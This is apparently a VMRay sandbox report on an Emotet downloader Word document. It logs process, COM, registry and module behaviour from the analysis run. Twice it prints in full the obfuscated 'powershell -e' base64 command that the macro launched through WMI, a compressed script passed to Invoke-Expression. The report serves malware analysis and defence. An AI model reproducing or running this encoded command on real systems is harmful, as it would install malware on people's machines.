2d2fa291...85b4 | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader

emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc

Word Document

Created at 2019-04-14T14:36:00

...
Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e8 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n -
#2 0x370 RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #1
#4 0xadc RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #2
#5 0xb08 Child Process Medium powershell.exe powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJwArACcAawBZAEUANABRAEMAegBTAGUAMwBCADIAUQBhAGUAYwBIAGEAbgArAEwAdQAxAFgAUABVAGUAagAnACsAJwBJAEwAUgBpAEYAegAnACsAJwBCAEsAawAxAFgAcQAnACsAJwA0ACcAKwAnAEQANAAnACsAJwBJACcAKwAnAGUAbABjACcAKwAnAEsAeABVAGsAJwArACcAbwB5AFgAbQBsAFUAUABwAE0AJwArACcAdgBnAFIAJwArACcAawA4ACcAKwAnAEoAbwBXADIAJwArACcAQgAnACsAJwBjAEgAMwB1AHoAJwArACcAWgAnACsAJwA0AGUARwBWACcAKwAnAHIAJwArACcATwBlAEoAcAAnACsAJwBHAEsAVQB0AG0ARABqAEQAegA2AGoAZQB2AHAATwBDACcAKwAnADQAOQAnACsAJwBHACcAKwAnADAAcwB0AGIAWQBZAEcAOQB3ACcAKwAnADcARgBEADQAbwBnACcAKwAnACsAYQBiAHgAQgBzAEQALwA4ACcAKwAnAHAAWgBiAEcAJwArACcAagAnACsAJwA0AEUASwBPACcAKwAnAEcAdgAnACsAJwBkACcAKwAnADgAdwBsACcAKwAnAEgASgBmADQARwBWAFUAYgByAFMAaQB0AHQAVQAnACsAJwBGAFcAJwArACcAUwBQAEwAJwArACcAYgB2AGgARQAyACcAKwAnAC8AJwArACcAawA2ACcAKwAnAE8AMwBIAHEAcABIAGkAYwAnACsAJwAvAFAAZAA1AG0AJwArACcAZABBAC8ATgA5AEQAegAvAFcATQBQAEoAQgA1ACcAKwAnADUATgBiADUAOABqAGwAUABZADMASwAnACsAJwBnAFkASgBLAFMAVwBqACcAKwAnAG0AeQBLADIAJwArACcAawBLAFcAZQAnACsAJwBqAEUARAAnACsAJwBnAG4AdgA3ACcAKwAnAEUAVQB1AE8AMQBwAFEASwBHAE8AUwAnACsAJwBXACcAKwAnAHAAJwArACcATQAwAFMAYQA0ACcAKwAnAEsAJwArACcAZgAnACsAJwB3AEcAcwBBAEoATAAnACsAJwBZAFIAVABIAGQASAArADIAcwBkAHUASwBhACcAKwAnADkANwBnAGcAVAAyAFQAeABuAHIARQBnAFAAcAAnACsAJwA2ACcAKwAnAFEAUgBGAGMAbgBGAFcAdABuACcAKwAnADcAJwArACcAcgBwAFkAbgBvAEIAbQBoAGMATwBGADgAJwArACcAMgBaACcAKwAnADUAZgB0ACcAKwAnAGIAagBuAC8AUAByACcAKwAnAFUAdgB4AEUARwB0ACcAKwAnAEgATABhAHIAJwArACcAKwAyACcAKwAnAFkAVABmACcAKwAnACsAJwArACcAaQAnACsAJwAvAFAAVwAwAGIANQAnACsAJwA1AEQAVwAnACsAJwBYAEcAawBqAHcAJwArACcAbQBEAEYASwBnAGUAVgBHAFEAYQBGAE0AJwArACcANwBzADEAbQBLACcAKwAnADIAdAB0AG8AZgBMAG0AeAAnACsAJwBmAG8AJwArACcAKwBpACcAKwAnADAAYQAzAGoATgBlACcAKwAnAGkARQBYACsAJwArACcAMgBaACcAKwAnAE8AKwBlAE4AbQBHAFMASABIADAARwA3AGMAVABBAGgAbQBKACcAKwAnAGgAVQBLACcAKwAnAFEARABRAGsAawBRADcAKwArAEkAdQB1AGwAeABZAHAAVgBsADcAdgBsAHoAYwBSADYAQwAwAHMAJwArACcANgAnACsAJwBaAFcAawBGADkALwBGAEkAbgArAEEAJwArACcAZwA9AD0AJwApACAAKQAsAFsASQBvAC4AYwBvAG0AUABSAGUAUwBTAGkAbwBuAC4AYwBPAE0AUABSAGUAcwBzAGkATwBOAE0AbwBEAEUAXQA6ADoAZABFAGMAbwBNAHAAUgBFAFMAcwAgACkAIAApACAALABbAHQAZQBYAHQALgBlAG4AQwBPAGQASQBOAEcAXQA6ADoAYQBTAEMAaQBpACkAKQAuAHIARQBhAGQAVABPAEUAbgBkACgAIAApACAAfAAmACgAIAAkAFYARQByAEIATwBTAEUAcAByAGUARgBFAFIAZQBOAGMAZQAuAHQATwBTAFQAcgBpAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAG8ASQBuACcAJwApAA== #4

Behavior Information - Grouped by Category

Process #1: winword.exe
333 0
»
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:48, Reason: Analysis Target
Unmonitor End Time: 00:03:59, Reason: Self Terminated
Monitor Duration 00:03:10
OS Process Information
»
Information Value
PID 0x8e8
Parent PID 0x458 (c:\windows\explorer.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A18
0x A14
0x 9D4
0x 9D0
0x 9CC
0x 9C8
0x 9C4
0x 9C0
0x 9BC
0x 9B8
0x 9B4
0x 9B0
0x 9AC
0x 98C
0x 988
0x 8FC
0x 8F4
0x 8F0
0x 8EC
0x A70
0x A74
0x A7C
0x AC0
0x 768
0x 7DC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x06A19254 0x06A19293 Marked Executable - 64-bit - False False
...
winword.exe 0x13F2A0000 0x13F47BFFF Forced - 64-bit - False False
...
buffer 0x06A19254 0x06A19293 Content Changed - 64-bit 0x06A1925C False False
...
buffer 0x0AFB5B84 0x0AFB5BC7 Marked Executable - 64-bit - False False
...
buffer 0x0AFB5FC4 0x0AFB6003 Marked Executable - 64-bit - False False
...
buffer 0x0AFB6084 0x0AFB60C3 Marked Executable - 64-bit - False False
...
buffer 0x0AFB6084 0x0AFB60C3 Content Changed - 64-bit 0x0AFB6084 False False
...
buffer 0x0AFDB864 0x0AFDB8AF Marked Executable - 64-bit - False False
...
buffer 0x0AFDB864 0x0AFDB8AF Content Changed - 64-bit 0x0AFDB864 False False
...
Host Behavior
COM (9)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 2
Fn
Create WbemDefaultPathParser IWbemPath cls_context = CLSCTX_INPROC_SERVER True 5
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
Registry (55)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\system32\stdole2.tlb True 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = VbaCapability, data = 216 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Impersonation Level, data = 3 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace, data = 114 True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJwArACcAawBZAEUANABRAEMAegBTAGUAMwBCADIAUQBhAGUAYwBIAGEAbgArAEwAdQAxAFgAUABVAGUAagAnACsAJwBJAEwAUgBpAEYAegAnACsAJwBCAEsAawAxAFgAcQAnACsAJwA0ACcAKwAnAEQANAAnACsAJwBJACcAKwAnAGUAbABjACcAKwAnAEsAeABVAGsAJwArACcAbwB5AFgAbQBsAFUAUABwAE0AJwArACcAdgBnAFIAJwArACcAawA4ACcAKwAnAEoAbwBXADIAJwArACcAQgAnACsAJwBjAEgAMwB1AHoAJwArACcAWgAnACsAJwA0AGUARwBWACcAKwAnAHIAJwArACcATwBlAEoAcAAnACsAJwBHAEsAVQB0AG0ARABqAEQAegA2AGoAZQB2AHAATwBDACcAKwAnADQAOQAnACsAJwBHACcAKwAnADAAcwB0AGIAWQBZAEcAOQB3ACcAKwAnADcARgBEADQAbwBnACcAKwAnACsAYQBiAHgAQgBzAEQALwA4ACcAKwAnAHAAWgBiAEcAJwArACcAagAnACsAJwA0AEUASwBPACcAKwAnAEcAdgAnACsAJwBkACcAKwAnADgAdwBsACcAKwAnAEgASgBmADQARwBWAFUAYgByAFMAaQB0AHQAVQAnACsAJwBGAFcAJwArACcAUwBQAEwAJwArACcAYgB2AGgARQAyACcAKwAnAC8AJwArACcAawA2ACcAKwAnAE8AMwBIAHEAcABIAGkAYwAnACsAJwAvAFAAZAA1AG0AJwArACcAZABBAC8ATgA5AEQAegAvAFcATQBQAEoAQgA1ACcAKwAnADUATgBiADUAOABqAGwAUABZADMASwAnACsAJwBnAFkASgBLAFMAVwBqACcAKwAnAG0AeQBLADIAJwArACcAawBLAFcAZQAnACsAJwBqAEUARAAnACsAJwBnAG4AdgA3ACcAKwAnAEUAVQB1AE8AMQBwAFEASwBHAE8AUwAnACsAJwBXACcAKwAnAHAAJwArACcATQAwAFMAYQA0ACcAKwAnAEsAJwArACcAZgAnACsAJwB3AEcAcwBBAEoATAAnACsAJwBZAFIAVABIAGQASAArADIAcwBkAHUASwBhACcAKwAnADkANwBnAGcAVAAyAFQAeABuAHIARQBnAFAAcAAnACsAJwA2ACcAKwAnAFEAUgBGAGMAbgBGAFcAdABuACcAKwAnADcAJwArACcAcgBwAFkAbgBvAEIAbQBoAGMATwBGADgAJwArACcAMgBaACcAKwAnADUAZgB0ACcAKwAnAGIAagBuAC8AUAByACcAKwAnAFUAdgB4AEUARwB0ACcAKwAnAEgATABhAHIAJwArACcAKwAyACcAKwAnAFkAVABmACcAKwAnACsAJwArACcAaQAnACsAJwAvAFAAVwAwAGIANQAnACsAJwA1AEQAVwAnACsAJwBYAEcAawBqAHcAJwArACcAbQBEAEYASwBnAGUAVgBHAFEAYQBGAE0AJwArACcANwBzADEAbQBLACcAKwAnADIAdAB0AG8AZgBMAG0AeAAnACsAJwBmAG8AJwArACcAKwBpACcAKwAnADAAYQAzAGoATgBlACcAKwAnAGkARQBYACsAJwArACcAMgBaACcAKwAnAE8AKwBlAE4AbQBHAFMASABIADAARwA3AGMAVABBAGgAbQBKACcAKwAnAGgAVQBLACcAKwAnAFEARABRAGsAawBRADcAKwArAEkAdQB1AGwAeABZAHAAVgBsADcAdgBsAHoAYwBSADYAQwAwAHMAJwArACcANgAnACsAJwBaAFcAawBGADkALwBGAEkAbgArAEEAJwArACcAZwA9AD0AJwApACAAKQAsAFsASQBvAC4AYwBvAG0AUABSAGUAUwBTAGkAbwBuAC4AYwBPAE0AUABSAGUAcwBzAGkATwBOAE0AbwBEAEUAXQA6ADoAZABFAGMAbwBNAHAAUgBFAFMAcwAgACkAIAApACAALABbAHQAZQBYAHQALgBlAG4AQwBPAGQASQBOAEcAXQA6ADoAYQBTAEMAaQBpACkAKQAuAHIARQBhAGQAVABPAEUAbgBkACgAIAApACAAfAAmACgAIAAkAFYARQByAEIATwBTAEUAcAByAGUARgBFAFIAZQBOAGMAZQAuAHQATwBTAFQAcgBpAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAG8ASQBuACcAJwApAA== - True 1
Fn
Module (167)
»
Operation Module Additional Information Success Count Logfile
Load Comctl32.dll base_address = 0x7fefbbe0000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7fee2ce0000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL base_address = 0x7fee2cb0000 True 1
Fn
Load OLEAUT32.DLL base_address = 0x7fefd480000 True 1
Fn
Load VBE7.DLL base_address = 0x7fee3780000 True 15
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\program files\microsoft office\root\office16\winword.exe base_address = 0x13f2a0000 True 1
Fn
Get Handle c:\windows\system32\msi.dll base_address = 0x7fef9580000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\system32\user32.dll base_address = 0x76f40000 True 1
Fn
Get Handle c:\windows\system32\oleaut32.dll base_address = 0x7fefd480000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 3
Fn
Get Address c:\windows\system32\msi.dll function = MsiProvideQualifiedComponentA, address_out = 0x7fef9603b3c True 1
Fn
Get Address c:\windows\system32\msi.dll function = MsiGetProductCodeA, address_out = 0x7fef95fa13c True 1
Fn
Get Address c:\windows\system32\msi.dll function = MsiReinstallFeatureA, address_out = 0x7fef9601618 True 1
Fn
Get Address c:\windows\system32\msi.dll function = MsiProvideComponentA, address_out = 0x7fef95ff088 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoVBADigSigCallDlg, address_out = 0x7fee2de72c0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoVbaInitSecurity, address_out = 0x7fee2d560b0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFIEPolicyAndVersion, address_out = 0x7fee2d01a60 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2d55f50 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFInitOffice, address_out = 0x7fee2cff000 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoUninitOffice, address_out = 0x7fee2cee860 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFGetFontSettings, address_out = 0x7fee2ce3fc0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoRgchToRgwch, address_out = 0x7fee2cf2380 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHrSimpleQueryInterface, address_out = 0x7fee2ce7b80 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHrSimpleQueryInterface2, address_out = 0x7fee2ce7b20 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateControl, address_out = 0x7fee2ce8730 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFLongLoad, address_out = 0x7fee2e23260 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFLongSave, address_out = 0x7fee2e23280 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFGetTooltips, address_out = 0x7fee2cf1f40 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFSetTooltips, address_out = 0x7fee2d56370 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFLoadToolbarSet, address_out = 0x7fee2d44590 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateToolbarSet, address_out = 0x7fee2ce55b0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHpalOffice, address_out = 0x7fee2cf0240 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFWndProcNeeded, address_out = 0x7fee2ce3d10 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFWndProc, address_out = 0x7fee2ce6d30 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateITFCHwnd, address_out = 0x7fee2ce3d40 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoDestroyITFC, address_out = 0x7fee2cee6f0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee2cedf40 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFGetComponentManager, address_out = 0x7fee2ce7bf0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoMultiByteToWideChar, address_out = 0x7fee2cefcd0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoWideCharToMultiByte, address_out = 0x7fee2ce8b20 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHrRegisterAll, address_out = 0x7fee2de2ef0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFSetComponentManager, address_out = 0x7fee2cf42c0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateStdComponentManager, address_out = 0x7fee2ce3e20 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFHandledMessageNeeded, address_out = 0x7fee2ceab10 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoPeekMessage, address_out = 0x7fee2cea7d0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateIPref, address_out = 0x7fee2ce1550 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoDestroyIPref, address_out = 0x7fee2cee830 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoChsFromLid, address_out = 0x7fee2ce13d0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoCpgFromChs, address_out = 0x7fee2ce6660 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoSetLocale, address_out = 0x7fee2ce1500 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee2ce3dd0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoSetVbaInterfaces, address_out = 0x7fee2de71e0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoGetControlInstanceId, address_out = 0x7fee2db6d10 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = VbeuiFIsEdpEnabled, address_out = 0x7fee2e298e0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = VbeuiEnterpriseProtect, address_out = 0x7fee2e29830 True 1
Fn
